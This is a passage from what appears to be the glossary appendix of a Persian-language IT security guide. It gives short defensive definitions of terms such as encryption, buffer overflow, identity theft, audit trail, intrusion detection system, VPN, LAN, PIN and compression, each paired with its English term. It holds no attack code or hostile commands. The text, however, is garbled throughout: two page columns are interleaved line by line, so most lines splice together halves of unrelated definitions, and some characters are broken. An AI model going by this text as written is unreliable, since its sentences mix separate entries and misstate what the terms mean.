‫ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﺓ ﺁﻥ ﺩﺍﺩﻩﻫﺎ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ .‬ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ‬ ‫)ﻣﺜﻞ ﺍﻟﮕـﻮﺭﻳﺘﻢ ‪ .(DES‬ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺭﺍﻫـﻲ ﺍﺳـﺖ ﺑـﺮﺍﻱ ﺍﺧﺘﻔـﺎﻱ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻓﻀﺎﻱ ﺧﺎﻟﻲ ﺟﻬﺖ ﺩﺍﺩﻩﻫﺎ ﺗﺎﺯﻩ‪ ،‬ﻛﺎﺭﺍﻛﺘﺮﻫﺎﻳﻲ‬ ‫ﺍﻃﻼﻋــﺎﺕ ﺑﮕﻮﻧــﻪﺍﻱ ﺑــﺴﺎﺩﮔﻲ ﺧﻮﺍﻧــﺪﻩ ﻧــﺸﻮﺩ‪ ،‬ﻣﮕــﺮ ﺗﻮﺳــﻂ‬
‫ﺭﺍ ﺣﺬﻑ ﻛﻨﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻤﺔ ﺍﻧـﻮﺍﻉ ﻣـﺸﻜﻼﺕ ﺭﺍ ﺑـﻪ ﺑـﺎﺭ‬ ‫ﺩﺭﻳﺎﻓﺖﻛﻨﻨﺪﮔﺎﻥ ﻣﻮﺭﺩ ﻧﻈﺮ‪ .‬ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﻧﻮﻉ ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ،‬ﻳـﻚ‬
‫ﻻ ﺑﻪ ﺍﺗﻔﺎﻗﺎﺗﻲ ﻣﻨﺠﺮ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ‬
‫ﺁﻭﺭﺩ ﻭ ﻣﻌﻤﻮ ﹰ‬ ‫"ﻛﻠﻴﺪ" ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑـﺮﺍﻱ ﺍﺧﺘﻔـﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻣﻲﺗﻮﺍﻥ ﭘﻴﺶ ﺍﺯ ﺍﻧﺘﻘﺎﻝ ﻫﺮ ﺩﺍﺩﻩ ﺑﻪ ﺣﺎﻓﻈـﻪ‬ ‫ﻣﻲﺷﻮﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺗﻨﻬـﺎ ﭘـﺲ ﺍﺯ ﺭﻣﺰﮔـﺸﺎﻳﻲ‬
‫ﻳﻚ ﺑﺮﺭﺳﻲ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﺣﺎﻓﻈﺔ ﻛـﺎﻓﻲ ﺍﻧﺠـﺎﻡ‬ ‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺧﻮﺍﻧﺪﻩ ﺷﻮﻧﺪ‪ ،‬ﻭ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻧﻴـﺰ ﺩﺍﻧـﺴﺘﻦ ﻛﻠﻴـﺪ‬
‫ﺩﺍﺩ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﺭﻳﺰﻱ ‪ buffer‬ﭘﻴﺸﮕﻴﺮﻱ ﻛﺮﺩ‪.‬‬ ‫ﺻﺤﻴﺢ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪.‬‬

‫‪٤٢٢‬‬ ‫‪٤١٦‬‬
‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻧﺘﻬﺎ ﺑﻪ ﺍﻧﺘﻬﺎ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﺯﻣﺎﻧﻲ ﺻﻮﺭﺕ ﻣﻲ ﮔﻴﺮﺩ ﻛﻪ ﺷﺨﺼﻲ ﺍﻃﻼﻋﺎﺕ ﻛـﺎﻓﻲ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺩﺭ ﻧﻘﻄﺔ ﺁﻏـﺎﺯﻳﻦ ﭘﻴـﺎﻡ ﺩﺭ ﺷـﺒﻜﻪ‪ ،‬ﻭ ﺑـﻪ ﺩﻧﺒـﺎﻝ ﺁﻥ‬
‫ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛﺮﺩﻩ ﺑﺎﺷﺪ ﻭ ﺑﺘﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺍﺷـﺨﺎﺹ ﺣﻘـﻮﻗﻲ‬ ‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﺩﺭ ﻣﻘﺼﺪ‪.‬‬

‫‪417 Decrypt‬‬
‫‪418 Cryptography‬‬ ‫‪412 Network-Level Firewall‬‬
‫‪419 Security Procedures‬‬ ‫‪413 Password Cracker‬‬
‫‪420 Incident Response Procedures‬‬ ‫‪414 Password‬‬
‫‪421 Buffer Overflow‬‬ ‫‪415 Encryption‬‬
‫‪422 Identity Theft‬‬ ‫‪416 End-to-End Encryption‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٦٠‬‬

‫‪٤٢٨‬‬
‫ﺳﻴﺴﺘﻢ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ )‪(GPS‬‬ ‫ﻫﻤﭽﻮﻥ ﺑﺎﻧﻜﻬﺎ‪ ،‬ﻓﺮﻭﺷﮕﺎﻫﻬﺎ ﻳﺎ ﺩﻭﻟﺖ‪ ،‬ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺷﻤﺎ ﺟـﺎ‬
‫ﻋﻤﺪﺗﹰﺎ ﺑﺮﺍﻱ ﻧﺎﻭﺑﺮﻱ ﺑﻜـﺎﺭ ﻣـﻲﺭﻭﺩ‪ .‬ﺍﻳـﻦ ﺳﻴـﺴﺘﻢ ﻣـﺎﻫﻮﺍﺭﻩﺍﻱ‪،‬‬ ‫ﺑﺰﻧﺪ‪.‬‬
‫ﻣﺤﻞ ﺩﻗﻴﻖ ﻣﺸﺘﺮﻛﺎﻥ ﺭﻭﻱ ﻛﺮﺓ ﺯﻣﻴﻦ ﺭﺍ ﻣﺸﺨﺺ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫‪٤٢٣‬‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫‪٤٢٩‬‬
‫ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ )‪(IDS‬‬ ‫ﺑﺼﻮﺭﺕ ﻋﺎﻡ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻛﻨﺘﺮﻟﮕﺮ ﺷﺒﻜﺔ ﻣﺤﻠـﻲ‪ ،‬ﻛـﻪ‬
‫ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺑﻪ ﻳﺎﻓﺘﻦ ﺭﺧﻨﻪﻫﺎ ﻳﺎ ﺗﻼﺷـﻬﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺭﺧﻨـﻪ‬ ‫ﺩﺳﺘﺮﺳﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﻪ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ‪ ،‬ﭼﺎﭘﮕﺮﻫـﺎ ﻭ ﺳـﺎﻳﺮ‬
‫ﺻــﻮﺭﺕ ﻣــﻲﮔﻴــﺮﺩ ﺍﺧﺘــﺼﺎﺹ ﺩﺍﺩﻩ ﺷــﺪﻩ‪ ،‬ﻭ ﺑــﺎ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ‬ ‫ﺑﺨﺸﻬﺎﻱ ﺷﺒﻜﻪ ﺭﺍ ﺗﺤﺖ ﻛﻨﺘﺮﻝ ﺩﺍﺭﺩ‪.‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺤﻠﻴﻠﮕﺮ ﻛﻪ ﺭﻭﻱ ﺛﺒﺘﻬﺎ ﻳﺎ ﺳﺎﻳﺮ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪ‬
‫‪٤٢٤‬‬
‫ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻋﻤﻞ ﻣﻲﻧﻤﺎﻳﺪ‪.‬‬ ‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ‬
‫ﺑﺼﻮﺭﺕ ﻋﺎﻡ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﻳﺎ ﺭﺍﻳﺎﻧﻪﻫﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻳـﻚ‬
‫‪٤٣٠‬‬
‫ﺳﻴﺎﺳﺖ‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﺭ ﺧﺼﻮﺹ ﺩﺭﻳﺎﻓﺖ ﻳﻚ ﺳـﺮﻭﻳﺲ ﺩﺭﺧﻮﺍﺳـﺖ‬
‫ﺿﻮﺍﺑﻄﻲ ﻛﻪ ﺩﺭ ﺳﻄﺢ ﺳﺎﺯﻣﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻌﻘـﻮﻝ ﺍﺯ ﻣﻨـﺎﺑﻊ‬ ‫ﻣﻲﻓﺮﺳﺘﻨﺪ ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﭘﺎﺳﺦ ﻣﻘﺘﻀﻲ ﺑﻪ ﺁﻧﻬﺎ ﻣﻲﺩﻫﺪ‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﺍﻱ‪ ،‬ﺭﺍﻫﻜﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﻭ ﺭﻭﺍﻟﻬﺎﻱ ﻋﻤﻠﻴﺎﺗﻲ ﺣﺎﻛﻢ ﺍﺳﺖ‪.‬‬
‫‪٤٢٥‬‬
‫ﺳﻠﺴﻠﺔ ﻣﻤﻴﺰﻱ‬
‫‪٤٣١‬‬
‫ﺷﺒﻜﺔ ﺧﺎﺭﺟﻲ‬ ‫ﻣﺠﻤﻮﻋﻪﺍﻱ ﻣﺴﺘﻨﺪ ﺍﺯ ﻭﻗﺎﻳﻌﻲ ﻛﻪ ﺭﺍﻫﺒﺮ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨـﺪ‬
‫ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺗﻮﺳﻌﺔ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺍﺯ ﻃﺮﻳﻖ ﺩﺳﺘﺮﺳﻲ ﺩﻭﺭ ﻳـﺎ‬ ‫ﻛﻪ ﺑﺘﻮﺍﻧﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﮔﺬﺷﺘﺔ ﺳﻴﺴﺘﻢ ﺭﺍ )ﺭﻭﻱ ﻛﺎﻏﺬ ﻳﺎ ﺭﻭﻱ ﺩﻳﺴﻚ(‬
‫ﺍﻳﻨﺘﺮﻧﺘــﻲ ﺑﮕﻮﻧــﻪﺍﻱ ﻛــﻪ ﺷــﺮﻛﺎﻱ ﺧــﺎﺭﺝ ﺍﺯ ﺳــﺎﺯﻣﺎﻥ ﻣﺜــﻞ‬ ‫ﺑﺎﺯﺳــﺎﺯﻱ ﻛﻨــﺪ‪ .‬ﺩﺭ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺭﺍﻳﺎﻧــﻪ‪ ،‬ﺯﻣــﺎﻥ ﻭﺭﻭﺩ‬
‫ﻋﺮﺿﻪﻛﻨﻨﺪﮔﺎﻥ ﻭ ﺧﺮﻳﺪﺍﺭﺍﻥ ﻣﻌﻤﻮﻝ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴـﺮﺩ‪ .‬ﭼﻨـﻴﻦ‬ ‫ﻛﺎﺭﺑﺮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ‪ ،‬ﻣﺪﺕﺯﻣﺎﻧﻲ ﻛﻪ ﻣﺸﻐﻮﻝ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ‬
‫ﺭﻭﺍﺑﻄﻲ ﺑﺎﻳﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺗﺼﺪﻳﻖﺷﺪﺓ ﺑﺨـﺸﻬﺎﻱ ﻣﺠـﺎﺯ‬ ‫ﻫﺴﺘﻨﺪ‪ ،‬ﻛﺎﺭﻱ ﻛﻪ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪ ،‬ﻭ ﺍﻳﻨﻜﻪ ﺁﻳﺎ ﺗﺨﻠﻒ ﺗﻌﻤﺪﻱ ﺍﺯ‬
‫ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺍﻧﺠﺎﻡ ﺷﻮﻧﺪ ﻭ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﻧﻴﺰ ﺑﺮﺍﻱ ﺣﻔﻆ ﺣﺮﻳﻢ‬ ‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩ ﻳﺎ ﻧﻪ‪ ،‬ﺑﺘﺮﺗﻴﺐ ﺯﻣـﺎﻥ ﻭﻗـﻮﻉ ﺑـﻪ‬
‫ﺧﺼﻮﺻﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﮔﺮﺩﻧﺪ‪.‬‬ ‫ﺛﺒﺖ ﻣﻲﺭﺳﻨﺪ‪.‬‬

‫‪٤٣٢‬‬ ‫‪٤٢٦‬‬
‫ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪(VPN‬‬ ‫ﺳﻴﺴﺘﻢ ﺟﻬﺎﻧﻲ ﺍﺭﺗﺒﺎﻃﺎﺕ ﺳﻴﺎﺭ )‪(GSM‬‬
‫ﻳﻚ ﺍﺗﺼﺎﻝ ﺧﺼﻮﺻﻲ ﻣﻴـﺎﻥ ﺩﻭ ﻣﺎﺷـﻴﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﺍﺩﻩﻫـﺎﻱ‬ ‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺎﺯ ﻭ ﻏﻴﺮ ﺍﻧﺤـﺼﺎﺭﻱ ﺍﺳـﺖ ﻛـﻪ ﭘﻴﻮﺳـﺘﻪ ﺩﺭﺣـﺎﻝ‬
‫ﺗﺮﺍﻓﻴﻜﻲ ﺧﺼﻮﺻﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ‪ .‬ﻓﻨﺎﻭﺭﻱ‬ ‫ﺗﻜﺎﻣﻞ ﺍﺳﺖ‪ .‬ﮔﺮﺩﺵ ﻣﺎﻫﻮﺍﺭﺓ ‪ GSM‬ﺍﻣﻜﺎﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻳـﻦ‬
‫‪ VPN‬ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧـﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ‬ ‫ﺳﺮﻭﻳﺲ ﻣﻨﺎﻃﻘﻲ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺩﺭ ﭘﻮﺷﺶ ﺯﻣﻴﻨﻲ ﻣﻤﻜﻦ ﻧﻴﺴﺖ‬
‫ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪﺍﻱ ﺧﻮﺩ ﺭﺍ ﺑﻄﻮﺭ ﻣﺤﺮﻣﺎﻧـﻪ ﺑـﻪ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍﻩ ﺩﻭﺭ‪،‬‬ ‫ﺭﺍ ﻓﺮﺍﻫﻢ ﺁﻭﺭﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﻓﺎﺗﺮ ﺷﻌﺐ‪ ،‬ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻫﻤﻜﺎﺭ ﺑﺮﺳﺎﻧﺪ‪.‬‬
‫‪٤٢٧‬‬
‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ )‪(OS‬‬
‫‪٤٣٣‬‬
‫ﺷﺒﻜﺔ ﻣﺤﻠﻲ )‪(LAN‬‬ ‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻤﻲ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺟـﺎﻧﺒﻲ ﺁﻧـﺮﺍ‬
‫ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﻪﻫـﻢ ﻣﺘـﺼﻞ ﺍﺯ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ‪.‬‬ ‫ﻛﻨﺘﺮﻝ ﻣﻲ ﻛﻨﺪ‪ .‬ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﺟﺪﻳﺪﺗﺮ ﻣﺜﻞ ‪،Linux ،Unix‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﺔ ﻣﺤﻠﻲ‪ ،‬ﺍﻃﻼﻋﺎﺕ ﻳﻜـﺪﻳﮕﺮ ﻭ ﻗﺎﺑﻠﻴـﺖ ﺍﺑﺰﺍﺭﻫـﺎﻱ‬ ‫ﻭ ‪ Windows XP‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﭘﺎﻳﻪﺍﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ‬
‫ﻼ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭼﺎﭘﮕﺮﻫـﺎﻱ‬‫ﺟﺎﻧﺒﻲ ﺭﺍ ﺑﻪﺍﺷﺘﺮﺍﻙ ﻣﻲﮔﺬﺍﺭﻧﺪ ‪ -‬ﻣﺜ ﹰ‬ ‫ﻧﻴﺰ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﺑﺼﻮﺭﺕ ﺍﺷﺘﺮﺍﻛﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬

‫‪428 Global Positioning System‬‬ ‫‪423 Server‬‬


‫‪429 Intrusion Detection System‬‬ ‫‪424 Client‬‬
‫‪430 Policy‬‬ ‫‪425 Audit Trail‬‬
‫‪431 Extranet‬‬ ‫‪426 Global System for Mobile Communication‬‬
‫‪432 Virtual Private Network‬‬ ‫‪427 Operating System‬‬
‫‪433 Local Area Network‬‬
‫‪٤٦١‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫‪٤٤٠‬‬
‫ﺿﻤﻴﻤﻪ‬ ‫ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ )‪(WLAN‬‬
‫ﺿﻤﻴﻤﻪ ﺗﻜﻨﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻣﺘـﻮﻥ ﻭ ﺗـﺼﺎﻭﻳﺮ‬ ‫ﻳﻚ ﺷﺒﻜﺔ ﺑﻲﺳﻴﻢ ﻛﻪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﻳـﺎ ﺳـﺎﻳﺮ‬
‫ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺳـﺎﻝ ﺷـﻮﻧﺪ‪ .‬ﻫـﺮ ﻓﺎﻳـﻞ‬ ‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﻴﺎﺭ ﺑﻪ ﺷﺒﻜﻪﻫﺎ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪.‬‬
‫ﻏﻴﺮﻧﻮﺷﺘﺎﺭﻱ )ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻳﺎ ﺗﺼﻮﻳﺮ ﻳﺎ ﻓـﻴﻠﻢ ﻭﻳـﺪﺋﻮﻳﻲ( ﺗﺒـﺪﻳﻞ ﺑـﻪ ﻳـﻚ‬
‫‪٤٣٤‬‬
‫ﺷﻜﻞ ﻗﺎﺑﻞ ﭼـﺎﭖ ﻣـﻲﺷـﻮﺩ ﻛﺪﮔـﺬﺍﺭﻱ ﻭ ﺩﺭ ﻣـﺘﻦ ﭘﻴـﺎﻡ ﻗـﺮﺍﺭ‬ ‫ﺷﻤﺎﺭﺓ ﻫﻮﻳﺖ ﺷﺨﺼﻲ )‪(PIN‬‬
‫ﻣﻲﮔﻴﺮﺩ‪ .‬ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩﺷﺪﻩ ﻣﺘﺸﻜﻞ ﺍﺯ ﺻﻔﺮﻫﺎ ﻭ‬ ‫ﻳﻚ ﺭﺷﺘﻪ ﺍﺯ ﺍﻋﺪﺍﺩ ﻳﺎ ﺣﺮﻭﻑ ﻛﻪ ﺑـﺮﺍﻱ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ ﻳـﻚ‬
‫ﻳﻚﻫﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺳﺎﺩﻩﺗﺮﻳﻦ ﺣﺎﻟﺖ‪ ،‬ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮ ﻭ ﻳﻚﻫﺎ‬ ‫ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﻳﺎ ﺳﺮﻭﻳﺲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪ .‬ﺷﻤﺎﺭﺓ ﻫﻮﻳﺖ‬
‫ﺭﺍ ﺑﻪ ﺣﺮﻭﻑ ﻣﺘﻦﺳﺎﺩﻩ ﺗﺒﺪﻳﻞ ﻣﻲﻛﻨﺪ‪.‬‬ ‫ﺷﺨﺼﻲ ﻣﺸﺎﺑﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺍﺳﺖ ﺍﻣﺎ ﻋﻤﻮﻣﹰﺎ ﻣﺮﺑﻮﻁ ﺑـﻪ ﻣﻌـﺎﻣﻼﺕ‬
‫ﻣﺎﻟﻲ )ﺣﺴﺎﺑﻬﺎﻱ ﺑﺎﻧﻜﻲ ﻳﺎ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒـﺎﺭﻱ( ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ‬
‫ﻓﺸﺮﺩﻩﺳﺎﺯﻱ‬ ‫ﻳﻚ ﻣﻜﺎﻥ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻳﺎ ﺍﻧﺘﻘﺎﻝ ﺣﺠﻢ ﺯﻳﺎﺩﻱ ﺍﺯ ﻣﺘﻮﻥ‪ ،‬ﺗـﺼﺎﻭﻳﺮ‪ ،‬ﻭ‬
‫‪٤٣٥‬‬
‫ﺑﺮﻧﺎﻣــﻪﻫــﺎ‪ .‬ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺗﻤــﺎﻡ ﺳــﻮﺍﺑﻖ ﺑﺎﻳﮕــﺎﻧﻲ ﻧﻴــﺰ‬ ‫ﺷﻨﺎﺳﺎﻳﻲ‬
‫ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﺷﻮﺩ؛ ﻭ ﺩﺭ ﺣﻘﻴﻘﺖ ﺩﺭ ﺗﻬﻴﻪ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‪،‬‬ ‫ﺷﻨﺎﺧﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻧﺎﻣﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻳﻜﺘﺎ‪.‬‬
‫ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻳـﻚ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺍﺳـﺖ‪ .‬ﺍﺯ ﺑﺎﻳﮕـﺎﻧﻲﻫـﺎﻱ ﻓـﺸﺮﺩﻩ‬ ‫‪٤٣٦‬‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ‬
‫ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ "‪ "zip‬ﻭ "‪ "tar‬ﺍﺷﺎﺭﻩ ﻛـﺮﺩ ﻛـﻪ ﻣـﻲﺗﻮﺍﻧﻨـﺪ‬
‫ﻓﺮﺁﻳﻨﺪﻱ ﻛﻪ ﻛﺎﺭﺑﺮ ﺗﻮﺳﻂ ﺁﻥ ﺧﻮﺩ ﺭﺍ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛـﺎﺭﺑﺮ ﻣﻌﺘﺒـﺮ‬
‫ﺣﺠﻢ ﺯﻳﺎﺩﻱ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﻣﺘﻔﺮﻗـﻪ ﺭﺍ ﺩﺭ ﻳـﻚ ﻗﺎﻟـﺐ ﭼﮕـﺎﻝ ﻭ‬
‫ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻌﺮﻓﻲ ﻣﻲﻛﻨﺪ‪ .‬ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ ﺑـﺎ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ‬
‫ﻓﺸﺮﺩﻩ ﻧﮕﻬﺪﺍﺭﻧﺪ‪ .‬ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺩ ﺑﺎﻳﺪ ﺍﺯ ﻗﺎﻟـﺐ ﻓـﺸﺮﺩﻩ‬
‫‪ -‬ﻛﻪ ﻃﻲ ﺁﻥ ﻣﺸﺨﺺ ﻣﻲﺷﻮﺩ ﻛﺎﺭﺑﺮ ﻫﻤﺎﻥ ﻛﺴﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺧﺎﺭﺝ ﺷﻮﻧﺪ‪ .‬ﭼﻨﺪ ﻓﺮﻭﺷﻨﺪﻩ ﻭ ﺗﻌﺪﺍﺩﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺭﺍﻳﮕـﺎﻥ ﺑـﺮﺍﻱ‬
‫ﺧﻮﺩﺵ ﺍﺩﻋﺎ ﻣﻲﻛﻨﺪ ﻭ ﺣﻖ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺳﻴﺴﺘﻢ ﺭﺍ ﻧﻴﺰ ﺩﺍﺭﺩ ‪-‬‬
‫ﻓﺸﺮﺩﻩﺳﺎﺯﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﻧﻴﺴﺖ‪.‬‬
‫‪٤٤١‬‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‬ ‫‪٤٣٧‬‬
‫ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ‬
‫ﺍﺣﺘﻤﺎﻝ ﺍﻳﻨﻜﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺑﺘﻮﺍﻧﺪ ﻭﻇﻴﻔﺔ ﺧﻮﺩ ﺭﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺩﺭ‬
